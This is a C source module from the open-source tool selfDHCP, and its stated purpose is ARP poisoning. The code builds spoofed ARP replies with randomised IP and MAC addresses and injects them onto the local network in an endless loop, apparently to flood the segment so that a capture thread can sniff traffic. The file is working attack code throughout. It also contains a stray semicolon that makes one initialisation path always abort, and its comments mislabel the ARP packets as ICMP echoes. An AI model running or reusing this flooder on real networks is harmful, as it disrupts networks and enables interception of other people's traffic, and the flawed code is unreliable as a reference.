/* selfDHCP
 * Copyright (C) 2002-2003 Enrico "WiseLYNX" Manzini
 *
 * module:		selfdhcp_arpp.c
 * purposes:	functions for the arp poisoning
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2, or (at your option)
 * any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
 * 02111-1307, USA.
 */

#include "selfdhcp_arpp.h"

/* function arpp_init()
 * This function is used once to initialize all the libnet stuff used in the
 * flooding process.
 */
void
arpp_init (arpp_args_t * toinit)
{
  char lnet_errbuf[LIBNET_ERRBUF_SIZE];

#ifndef NEW_LIBNET_INTERFACE
  err_msg (DBG_PROG, "arpp_init(): initializing libnet packet memory");
  if (-1 == libnet_init_packet (LIBNET_MAX_PACKET, &(toinit->packetbuff)))
    err_quit ("libnet_init_packet() failed");
  if (NULL ==
      (toinit->net_link =
       libnet_open_link_interface (toinit->device, lnet_errbuf)))
    err_quit ("libnet_open_link_interface() failed: %s", lnet_errbuf);
#else
  err_msg (DBG_PROG, "arpp_init(): initializing libnet stuff");
  if (NULL ==
      (toinit->lnet_struct =
       libnet_init (LIBNET_LINK, toinit->device, lnet_errbuf)));
  err_quit ("libnet_init() failed");
#endif
  return;
}

/* function arpp_doit()
 * This is the mail loop of the flooding process. The function is called through
 * pthread_create(), so arguments are passed with a void**; see selfdhcp_arpp.h
 * for details about it.
 */
void
arpp_doit (void **void_args)
{
  arpp_args_t *args;
  u_char mac_pippo[ETH_ALEN], mac_pluto[ETH_ALEN];
  uint32_t ip_pippo, ip_pluto;
  struct timeval seed;
  int count;

  args = (arpp_args_t *) void_args;
  while (1)
    {
/* first we get some random IP and MAC addresses */
      gettimeofday (&seed, NULL);
      srand ((unsigned int) (seed.tv_usec));
      ip_pippo = GEN_RAND_IP (NULL);
      ip_pluto = GEN_RAND_IP (NULL);
      for (count = 0; count < ETH_ALEN; count++)
	{
	  mac_pippo[count] = 1 + (u_char) (rand () % 254);
	  mac_pluto[count] = 1 + (u_char) (rand () % 254);
	}
      for (count = 0; count < ((args->arpdim) / 2); count++)
	{
/* IPs and MACs are increased */
	  ip_pippo = htonl (ntohl (ip_pippo) + 1);
//                      ip_pippo=0xffffffff;
	  ip_pluto = htonl (ntohl (ip_pluto) + 1);
	  rand_mac (mac_pippo);
	  rand_mac (mac_pluto);
//                      mac_pippo[ETH_ALEN]=(mac_pippo[ETH_ALEN]+1)%254;
//                      mac_pluto[ETH_ALEN]=(mac_pluto[ETH_ALEN]+1)%254;
/* firts we build an ICMP echo request */
//                      build_and_inject(args,ip_pippo,ip_pluto,mac_pippo,
//                                                       mac_pluto,ARPOP_REQUEST);
/* because it's unpolite not to answer, we build the echo reply too :) */
	  build_and_inject (args, ip_pluto, ip_pippo, mac_pluto,
			    /*mac_pippo, */ ARPOP_REPLY);
	}
//              err_msg(MSG_INFO,"flooded %d packets, now sleep for %d seconds",
//                              args->arpdim,args->tosleep);
/* we sleep to let some time for the capture thread to get some packets */
//              sleep(args->tosleep);
    }
}

/* function build_and_inject()
 * This function does the dirty work of building and injecting the ICMP echoes
 * required for the flooding. The argument type must be ICMP_ECHO or
 * ICMP_ECHOREPLY.
 */
void
build_and_inject (arpp_args_t * args, uint32_t src_ip, uint32_t dst_ip,
		  u_char * src_mac, /*u_char *dst_mac, */ u_char type)
{
  u_char bcastMAC[] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
  u_char arp_pad[ARP_PAD];
//      char buffer[30];

  memset (arp_pad, 0, ARP_PAD);
#ifndef NEW_LIBNET_INTERFACE
  err_msg (DBG_LIB, "building ether header");
  if (-1 ==
      libnet_build_ethernet (bcastMAC /*dst_mac */ , src_mac, ETHERTYPE_ARP,
			     NULL, 0, args->packetbuff))
    err_msg (MSG_ERR, "libnet_build_ethernet() failed while arp flooding");
  err_msg (DBG_LIB, "building arp header");
  if (-1 == libnet_build_arp (ARPHRD_ETHER, ETHERTYPE_IP, ETH_ALEN,
			      sizeof (struct in_addr), type, src_mac,
			      (u_char *) & src_ip, bcastMAC,
			      (u_char *) & dst_ip, arp_pad, ARP_PAD,
			      (args->packetbuff) + LIBNET_ETH_H))
    err_quit ("libnet_build_arp() failed");
  err_msg (DBG_LIB, "injecting flood packet");
  if (-1 ==
      libnet_write_link_layer (args->net_link, args->device, args->packetbuff,
			       LIBNET_ETH_H + LIBNET_ARP_H + ARP_PAD))
    err_msg (MSG_ERR, "libnet_write_link_layer() failed while arp flooding");
#else
  err_msg (DBG_LIB, "building arp header");
  if (-1 == libnet_build_arp (ARPHRD_ETHER, ETHERTYPE_IP, ETH_ALEN,
			      sizeof (struct in_addr), type, src_mac,
			      (u_char *) & src_ip, bcastMAC,
			      (u_char *) & dst_ip, arp_pad, ARP_PAD,
			      args->lnet_struct, 0))
    err_quit ("libnet_build_arp() failed");
  err_msg (DBG_LIB, "building ether header");
  if (-1 ==
      libnet_build_ethernet (bcastMAC /*dst_mac */ , src_mac, ETHERTYPE_ARP,
			     NULL, 0, args->lnet_struct, 0))
    err_msg (MSG_ERR, "libnet_build_ethernet() failed while arp flooding");
  err_msg (DBG_LIB, "injecting flood packet");
  if (-1 == libnet_write (args->lnet_struct))
    err_msg (MSG_ERR, "libnet_write() failed while arp flooding");
#endif
  usleep (ARPFLOOD_WAIT);
  return;
}

void
rand_mac (u_char * mac2rand)
{
  struct timeval seed;
  register int count;

  gettimeofday (&seed, NULL);
  srand ((unsigned int) (seed.tv_usec));

  for (count = 0; count < ETH_ALEN; count++)
    mac2rand[count] = 1 + (u_char) (rand () % 254);
  return;
}
